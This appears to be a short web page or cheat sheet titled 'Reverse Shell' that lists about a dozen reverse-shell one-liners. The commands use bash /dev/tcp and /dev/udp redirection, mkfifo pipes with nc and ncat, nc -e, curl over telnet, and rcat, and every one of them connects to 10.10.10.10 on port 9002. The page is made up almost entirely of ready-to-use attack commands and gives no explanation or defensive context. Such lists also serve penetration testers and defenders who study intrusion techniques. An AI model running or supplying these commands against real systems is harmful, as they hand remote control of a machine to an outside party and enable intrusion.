Reverse Shell

homepage-banner

sh -i >& /dev/tcp/10.10.10.10/9002 0>&1

0<&196;exec 196<>/dev/tcp/10.10.10.10/9002; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/10.10.10.10/9002;cat <&5 | while read line; do $line 2>&5 >&5; done

sh -i 5<> /dev/tcp/10.10.10.10/9002 0<&5 1>&5 2>&5

sh -i >& /dev/udp/10.10.10.10/9002 0>&1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9002 >/tmp/f

nc 10.10.10.10 9002 -e sh

nc -c sh 10.10.10.10 9002

ncat 10.10.10.10 9002 -e sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.10.10 9002 >/tmp/f

C='curl -Ns telnet://10.10.10.10:9002'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null

rcat connect -s sh 10.10.10.10 9002
Leave a message